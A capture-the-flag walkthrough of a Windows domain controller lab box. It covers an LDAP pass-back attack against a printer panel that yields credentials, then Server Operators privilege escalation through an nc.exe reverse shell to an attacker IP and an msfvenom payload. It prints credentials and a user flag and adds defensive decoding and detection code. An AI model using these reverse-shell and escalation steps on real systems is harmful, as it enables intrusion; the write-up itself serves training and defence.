Copy of Return
rustscan --addresses 10.10.11.108 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

nmap -p- 10.10.11.108 --min-rate 5000

nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001 -sC -sV -oN nmapscan 10.10.11.108 -T5

The scans show several open TCP ports such as 53, 88, 389, 636, 3268, 5985, etc. Based on that, we can conclude that the target machine is a Windows domain controller. Nevertheless, we also have port 80 open. Well, let's start our enumeration with that port, then move on to the other protocols if we find nothing.
HTTP - TCP/80
In this section, we are going to enumerate the web server.
Let's take a quick look at the main webpage.

This is the printer admin panel page. Let's see if we can retrieve the password by inspecting the source code.

The password is not stored in the source code as clear text.
Well, let's try to intercept the request with Burp after clicking on the Update button.

As you can see, a POST request is sent to /settings.php with the IP address specified in the server address input.
So, what happens when we replace this IP address with ours?
Send the request to Repeater and change the server address to the Kali tunnel IP.

Let's run our netcat listener on port 389.

Once done, we can forward the intercepted request to the server, and we should receive the following on our machine.

We can see that we have a username, return\svc-printer, and another string, 1edFg43012!!, which might be svc-printer's password. Well, let's check whether this gives us initial access to the target system.
for proto in {smb,winrm,wmi,ldap}; do nxc $proto 10.10.11.108 -d return.local -u svc-printer -p '1edFg43012!!'; done

This one-liner is a command I always use because it checks authentication against several protocols without having to run the command several times, once per protocol. The authentication succeeded.
The attack above is called an LDAP Pass-back attack. It's a common attack against network devices, such as printers. It can be performed when we gain access to a device's configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we modify the configured LDAP server IP to our own IP and then test the LDAP configuration, which forces the device (here the printer) to attempt LDAP authentication to our machine. We can then intercept this authentication attempt to recover the LDAP credentials.
Let's try to authenticate to the svc-printer account with evil-winrm.
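To show why a plain netcat listener is enough to read the credentials, here is a small decoder for the LDAP simple BindRequest the printer emits; it is an added example, not code from the writeup. The packet is constructed from the DN and password recovered above; a network sensor or DC-side logging of simple binds over cleartext would see the same structure, and the fix on the device side is to require LDAPS or a signed SASL bind instead of a simple bind to a plain TCP/389 address.

```python
"""Decode an LDAP simple BindRequest as seen by a listener on TCP/389."""
# Added example, not code from the writeup. The constructed packet below
# carries the DN/password the writeup recovered; a sensor would take the
# bytes from a capture instead.

def _read_tlv(buf: bytes, pos: int):
    """Read one BER tag/length/value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length (>127 bytes)
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_bind_request(pkt: bytes) -> dict:
    """Return message id, LDAP version, bind DN and authentication choice."""
    tag, body, _ = _read_tlv(pkt, 0)
    if tag != 0x30:                         # LDAPMessage is a SEQUENCE
        raise ValueError("not an LDAPMessage")
    _, msg_id, pos = _read_tlv(body, 0)
    tag, op, _ = _read_tlv(body, pos)
    if tag != 0x60:                         # [APPLICATION 0] = BindRequest
        raise ValueError("not a BindRequest")
    _, ver, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    info = {"message_id": int.from_bytes(msg_id, "big"),
            "version": int.from_bytes(ver, "big"),
            "name": name.decode(),
            "auth": "simple" if auth_tag == 0x80 else "sasl"}
    if auth_tag == 0x80:                    # [0] simple: password sent in clear
        info["password"] = auth.decode()
    return info

def _tlv(tag: int, value: bytes) -> bytes:
    assert len(value) < 128                 # short-form length is enough here
    return bytes([tag, len(value)]) + value

def build_simple_bind(msg_id: int, name: str, password: str) -> bytes:
    """Encode the BindRequest an LDAP client sends for a simple bind."""
    op = _tlv(0x02, b"\x03") + _tlv(0x04, name.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x60, op))

# Constructed sample: what the printer sends once its LDAP server address
# points at the listener.
CAPTURED = build_simple_bind(1, r"return\svc-printer", "1edFg43012!!")

def plaintext_credentials(pkt: bytes) -> bool:
    """True when the bind exposes a reusable password (the pass-back risk)."""
    return parse_bind_request(pkt)["auth"] == "simple"
```

A SASL bind (tag 0xA3 in place of 0x80) would carry no reusable password, which is the property a hardened printer configuration should enforce.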
evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Let's retrieve the user flag - b5e473c1a2888bcf0a8759cfbb569dce

Post Exploitation
In this section, we will try to move laterally and escalate our privileges.
Let's first collect the domain information using bloodhound-python.
bloodhound-python -d return.local -u svc-printer -p '1edFg43012!!' -ns 10.10.11.108 -c all

bloodhound-python -d return.local -u svc-printer -p '1edFg43012!!' -ns 10.10.11.108 -c all --zip

Once done, you can launch BloodHound and upload the collected domain information into it.
┌──(root㉿kali)-[~/machines/Return]
└─# bloodhound

I took a look at BloodHound's pre-built analytics queries but found only this path.

The Server Operators abuse is a commonly overlooked attack path that can provide SYSTEM-level access in Windows environments.
Being a member of the Server Operators group is not a vulnerability in itself, but members of this group hold special privileges to make changes on domain controllers, which can let an attacker escalate to SYSTEM. We listed the services running on the server by issuing the "services" command in our evil-winrm terminal, which shows the list of installed services.
Exploitation Method 1
We transferred the netcat binary (nc.exe) to the compromised host and changed the binary path of a service. The reason we change the binary path is to receive a reverse connection as SYSTEM from the compromised host.
How does it work?
When a service is started, the Service Control Manager executes the binary from its configured binary path. If we replace the service binary path with netcat or a reverse shell binary, starting the service gives us a reverse shell as SYSTEM, because the service runs as SYSTEM on the compromised host. Please note that we need to specify the attacker's IP address and listening port as arguments to the netcat binary.
To do that, we first list the services running on the target machine, then change one service's binary path.

upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 443"
Exploitation Method 2
In this method, we are going to use a Metasploit reverse shell binary instead of nc.exe. Let's create an msfvenom reverse shell binary and save it as shell.exe. Let's break down the command used to create the payload. We select a payload matching the target operating system (a Windows x64 reverse TCP shell), then lhost and lport, which are the listening host (attacker IP) and listening port (8888 in our case); lastly, we set the output format with the -f flag, which saves the payload in exe format, and redirect it to shell.exe.
msfvenom -p windows/x64/shell/reverse_tcp lhost=10.10.16.4 lport=8888 -f exe > shell.exe
Once we have created the reverse shell payload binary, we upload it to the compromised system. We have our binary saved in the root directory; it might be somewhere else in your case.
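Both methods above leave the same footprint: the service's ImagePath value under HKLM\System\CurrentControlSet\Services\<name> is rewritten to a binary in a user-writable directory, which is what a detection should key on. The following is an added example (not part of the writeup) that runs such a check over constructed Sysmon Event ID 13 (registry value set) records in a simplified key=value line format; the field names follow Sysmon's, but the line format and the sample events are assumptions.

```python
"""Flag service ImagePath changes that point at user-writable locations.

Added detection example, not part of the writeup. Input is constructed
Sysmon Event ID 13 (RegistryEvent / value set) records in a simplified
key=value line format; a real pipeline would read them from a SIEM.
"""
import re

SERVICES_KEY = re.compile(
    r"^HKLM\\System\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)
# Locations a legitimate service binary should never live in.
SUSPECT_PATH = re.compile(r"\\Users\\|\\Temp\\|\\ProgramData\\|\\AppData\\", re.IGNORECASE)
# Netcat-style arguments that turn the service into a remote shell.
SHELL_ARGS = re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.IGNORECASE)

def parse_record(line: str) -> dict:
    """Parse 'Key=value; Key=value' summary lines into a dict."""
    return dict(part.split("=", 1) for part in line.strip().split("; "))

def check_imagepath_change(rec: dict):
    """Return (service, reason) for a suspicious binPath change, else None."""
    if rec.get("EventID") != "13":
        return None
    m = SERVICES_KEY.match(rec.get("TargetObject", ""))
    if not m:
        return None
    new_path = rec.get("Details", "")
    reasons = []
    if SUSPECT_PATH.search(new_path):
        reasons.append("binary in user-writable path")
    if SHELL_ARGS.search(new_path):
        reasons.append("shell-spawning arguments")
    # Image is services.exe even for 'sc config': the SCM writes the key on
    # behalf of the RPC caller, so the new path, not the writer, is the signal.
    return (m.group(1), "; ".join(reasons)) if reasons else None

# Constructed sample events modelled on the writeup's VMTools modification.
SAMPLE_LOG = """\
EventID=13; Image=C:\\Windows\\System32\\services.exe; TargetObject=HKLM\\System\\CurrentControlSet\\Services\\VMTools\\ImagePath; Details=C:\\Users\\svc-printer\\Documents\\nc.exe -e cmd.exe 10.10.16.4 443
EventID=13; Image=C:\\Windows\\System32\\services.exe; TargetObject=HKLM\\System\\CurrentControlSet\\Services\\VMTools\\ImagePath; Details="C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"
EventID=13; Image=C:\\Windows\\System32\\services.exe; TargetObject=HKLM\\System\\CurrentControlSet\\Services\\VMTools\\Start; Details=DWORD (0x00000002)
"""

def scan(log: str) -> list:
    """Run the check over every line; return [(service, reason), ...]."""
    return [h for h in (check_imagepath_change(parse_record(l)) for l in log.splitlines()) if h]
```

The msfvenom variant is caught by the path check alone, since shell.exe carries no arguments; an additional control is to audit Server Operators membership, which is the privilege that makes the binPath change possible in the first place.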